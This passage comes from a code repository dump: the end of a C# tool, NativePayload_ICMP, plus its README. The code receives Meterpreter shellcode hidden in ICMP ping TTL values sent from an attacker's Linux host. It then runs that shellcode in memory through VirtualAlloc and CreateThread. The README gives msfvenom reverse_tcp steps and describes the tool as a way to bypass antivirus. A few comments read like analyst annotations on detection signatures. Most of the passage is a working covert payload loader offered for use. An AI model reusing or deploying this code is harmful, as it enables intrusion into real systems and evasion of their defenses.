_HextoDecimal(ff); 170 | // debug only 171 | //Console.WriteLine(ff + " " + ss); 172 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 173 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; 
\n"); 174 | Console.WriteLine(); 175 | 176 | i++; 177 | 178 | } 179 | 180 | } 181 | 182 | 183 | //// debug only print codes by dec ;) 184 | //string fff; 185 | //for (int bb = 0; bb < payload.Length; ) 186 | //{ 187 | // fff = payload.Substring(bb, 1); 188 | // string ss = _HextoDecimal(fff); 189 | // Console.Write(ss.Substring(1, 2)); 190 | // bb++; 191 | //} 192 | 193 | } 194 | else 195 | { 196 | bool flag_end = false; 197 | bool init = false; 198 | int flag_end_count = 0; 199 | int Payload_counter = 0; 200 | string temp = ""; 201 | string start_time, end_time = ""; 202 | start_time = DateTime.Now.ToString(); 203 | string Oonaggi = ""; 204 | Console.ForegroundColor = ConsoleColor.Gray; 205 | Console.WriteLine(); 206 | Console.WriteLine("NativePaylaod_ICMPv4 Published by Damon Mohammadbagher"); 207 | Console.WriteLine("Strat Sending ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 208 | Console.WriteLine(); 209 | while (true) 210 | { 211 | 212 | 213 | if (flag_end) break; 214 | 215 | //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;) 216 | string getcode = _Ping(args[0], 1); 217 | try 218 | { 219 | 220 | getcode = getcode.Remove(getcode.Length - 1, 1); 221 | } 222 | catch (Exception e1) 223 | { 224 | Console.ForegroundColor = ConsoleColor.Red; 225 | Console.WriteLine("e1 : " + e1.Message); 226 | Console.WriteLine(); 227 | Console.WriteLine("Error : it is not good ;( "); 228 | Console.WriteLine("Please run this tool again"); 229 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 230 | Console.ForegroundColor = ConsoleColor.Gray; 231 | break; 232 | 233 | } 234 | 235 | if (getcode == "254") { init = true; } 236 | 237 | if (getcode != "255") 238 | { 239 | flag_end_count = 0; 240 | if (getcode != temp && getcode != "255") 241 | { 242 | if (init && getcode != "254") 243 | { 244 | Console.ForegroundColor = ConsoleColor.Green; 245 | Console.Write("{0} , Dump:{1},", 
DateTime.Now.ToString(), Payload_counter.ToString()); 246 | Console.ForegroundColor = ConsoleColor.Cyan; 247 | //string dd = _HextoDecimal(getcode.Substring(1, 2)); 248 | Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2)); 249 | Oonaggi += getcode.Substring(getcode.Length - 2, 2); 250 | Console.ForegroundColor = ConsoleColor.Green; 251 | Console.WriteLine("from {0} final: {1}", args[0], getcode); 252 | Payload_counter++; 253 | } 254 | else if (init == false) 255 | { 256 | Console.ForegroundColor = ConsoleColor.DarkGreen; 257 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 258 | } 259 | } 260 | else if (getcode == temp && getcode != "255") 261 | { 262 | Console.ForegroundColor = ConsoleColor.DarkGreen; 263 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 264 | } 265 | 266 | System.Threading.Thread.Sleep(1000); 267 | temp = getcode; 268 | } 269 | else if (getcode == "255") 270 | { 271 | flag_end_count++; 272 | Console.ForegroundColor = ConsoleColor.DarkGreen; 273 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 274 | 275 | System.Threading.Thread.Sleep(500); 276 | temp = getcode; 277 | if (flag_end_count >= 10) { flag_end = true; } 278 | } 279 | } 280 | 281 | end_time = DateTime.Now.ToString(); 282 | 283 | Console.WriteLine(end_time + " , Done "); 284 | 285 | byte[] __Bytes = new byte[Oonaggi.Length / 4]; 286 | int payload_dec_count = Oonaggi.Length / 4; 287 | int tmp_counter = 0; 288 | string current = null; 289 | int _0_to_2_ = 0; 290 | for (int d = 0; d < payload_dec_count; ) 291 | { 292 | string tmp1_current = (Oonaggi.Substring(tmp_counter, 2)); 293 | 294 | for (int j = 0; j <= 15; j++) 295 | { 296 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current)) 
297 | { 298 | _0_to_2_++; 299 | 300 | current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 301 | 302 | if (_0_to_2_ == 2) 303 | { 304 | Console.Write(current + " "); 305 | __Bytes[d] = Convert.ToByte(current, 16); 306 | _0_to_2_ = 0; 307 | d++; 308 | current = null; 309 | } 310 | 311 | } 312 | 313 | } 314 | 315 | tmp_counter++; 316 | tmp_counter++; 317 | 318 | } 319 | Console.WriteLine(); 320 | Console.ForegroundColor = ConsoleColor.Gray; 321 | Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)"); 322 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 323 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 324 | IntPtr hThread = IntPtr.Zero; 325 | UInt32 threadId = 0; 326 | IntPtr pinfo = IntPtr.Zero; 327 | 328 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 329 | WaitForSingleObject(hThread, 0xFFFFFFFF); 330 | 331 | } 332 | } 333 | catch (Exception _main) 334 | { 335 | Console.WriteLine("Main Error: {0}", _main.Message); 336 | Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message); 337 | 338 | 339 | } 340 | } 341 | 342 | 343 | static Dictionary HexDic = new Dictionary 344 | { 345 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 346 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 347 | 348 | {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108} 349 | ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115} 350 | }; 351 | 352 | static string _HextoDecimal(string hexstring) 353 | { 354 | 355 | string result = ""; 356 | hexstring = hexstring.ToLower(); 357 | for (int i = 0; i < hexstring.Length; i++) 358 | { 359 | char Oonagii = hexstring[hexstring.Length - 1 - i]; 360 | result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " "; 361 | } 362 | return result; 363 | } 364 | 365 | 366 | static string 
_Ping(string IPAddress_DNSName, int counter)
{
    string Final_Dec = "";

    try
    {
        //// 1 is good idea ;)
        //// 1 is best performance by 1 request and one ping response (default)
        //// 2 is slow performance by 2 request and two ping response
        //// if you want use 2 then you should change Sleep in Linux sh file too
        //// so in code i changed this to 1 ;) , Sorry
        // Pinned to a single echo request regardless of the caller's value.
        if (counter != 1) { counter = 1; }

        /// Make ICMPv4 traffic for getting Meterpreter Payloads by Ping
        // Host telemetry: one hidden ping.exe child per probe with stdout
        // redirected, repeated for the whole transfer. The host string is
        // concatenated into the argument list without quoting, so a value
        // containing spaces is parsed by ping.exe as extra options.
        ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString());
        ns_Prcs_info.RedirectStandardInput = true;
        ns_Prcs_info.RedirectStandardOutput = true;
        ns_Prcs_info.UseShellExecute = false;


        // The Process object is neither waited on nor disposed; only its
        // stdout is drained.
        Process myPing = new Process();
        myPing.StartInfo = ns_Prcs_info;
        myPing.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        myPing.Start();

        //string result_Line0 = "";
        string Pingoutput = myPing.StandardOutput.ReadToEnd();
        // Split on '\n' only, so a '\r' from Windows line endings presumably
        // stays at the end of each item — TODO confirm; Main strips one
        // trailing character for that reason.
        string[] All_lines = Pingoutput.Split('\t', '\n');

        //int PayloadLines_current_id = 0;
        // The tail of the LAST "Reply " line wins; with -n 1 there is at most
        // one. Nothing verifies that the tail actually holds a TTL — a
        // "Request timed out." run leaves Final_Dec as "".
        foreach (var item in All_lines)
        {
            if (item.StartsWith("Reply "))
            {
                Final_Dec = item.Substring(item.Length - 4);
            }
            // debug
            // Console.WriteLine(item + "\n"+ s);
        }


    }
    catch (Exception e)
    {
        // e.g. ping.exe not found / not startable; reported and "" is returned.
        Console.WriteLine(e.Message);
    }
    return Final_Dec;
}

// Win32 VirtualAlloc flags: commit the pages, and request write + execute on
// the same page (RWX). Mutable public fields rather than constants.
public static UInt32 MEM_COMMIT = 0x1000;
public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

// kernel32 P/Invoke surface used at the end of Main's receive branch:
// allocate, (Marshal.Copy), create a thread at the buffer address, wait.
// This trio called from a managed process is the classic shellcode-loader
// signature that ETW/EDR and memory-scanning rules look for.
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32
lpThreadId); 423 | [DllImport("kernel32")] 424 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 425 | } 426 | } 427 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_ICMP v1.0 2 | C# code Published by Damon Mohammadbagher 3 | 4 | Article step by step : https://www.peerlyst.com/posts/transfer-download-payload-by-icmpv4-traffic-via-ttl-damon-mohammadbagher 5 | 6 | 7 | NativePayload_ICMP : transfer Backdoor Payloads by ICMPv4 Traffic and bypassing Anti-Viruses 8 | 9 | Tested : Win7 SP1 and Win 2008 R2 10 | 11 | step by step: 12 | 13 | example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt 14 | 15 | note: copy your msfvenom output payloads to 'Payload string' like 'fc4883e4f0e8cc00000415141505265' 16 | 17 | example step2 c:\\> NativePayload_ICMP.exe null "Payload string" > script.sh 18 | 19 | example step2 c:\\> NativePayload_ICMP.exe null fc4883e4f0e8cc00000415141505265 > script.sh 20 | 21 | example step3 c:\\> NativePayload_ICMP.exe ipaddress (sending ICMPv4 traffic to this ipaddress by ping) 22 | 23 | example step3 c:\\> NativePayload_ICMP.exe 192.168.1.50 24 | 25 | example step4 linux side ./script.sh (run this script in PING Responder linux system). 26 | 27 | note: after chmod also adding #!/bin/bash to script.sh file , you can run this script in PING Responder system. 
28 | 29 | note: you should run this script in your linux after step3 for Response to PING traffic from backdoor system 30 | 31 | note: Backdoor system is win with NativePayload_ICMP.exe and ipaddress for example: 192.168.1.120 32 | 33 | note: PING Responder system is linux with ./script.sh and ipaddress for example : 192.168.1.50 34 | 35 | note: PING Responder system is also Meterpreter Listener by ipaddress : 192.168.1.50 36 | 37 | 38 | 39 | in this case after 1020 ping request and response you have Meterpreter Session by ICMPv4 40 | 41 | Dumping Payloads by TTL from PING Response... 42 | 43 | Meterpreter Payload is 510 bytes 44 | 45 | 510 * 2 = 1020 46 | 47 | 0 ... 1019 = 1020 Request 48 | 49 | 50 | 51 | # NativePayload_ICMP v2.0 52 | 53 | "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 Released for Ebook. (May 2018 , bug fixed). 54 | 55 | NativePayload_ICMP.exe v2.0 syntax: 56 | NativePayload_ICMP.exe help 57 | 58 | NativePayload_ICMP.sh v1.0 syntax: 59 | step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext "your text or string" 60 | step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen "w.x.y.z" 61 | Note: in step1 you should use Client-side system w.x.y.z IPv4Address 62 | help syntax : ./NativePayload_ICMP.sh help 63 | 64 | Download "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 here : https://github.com/DamonMohammadbagher/NativePayload_ICMP/tree/master/EBOOK 65 | 66 |

67 | --------------------------------------------------------------------------------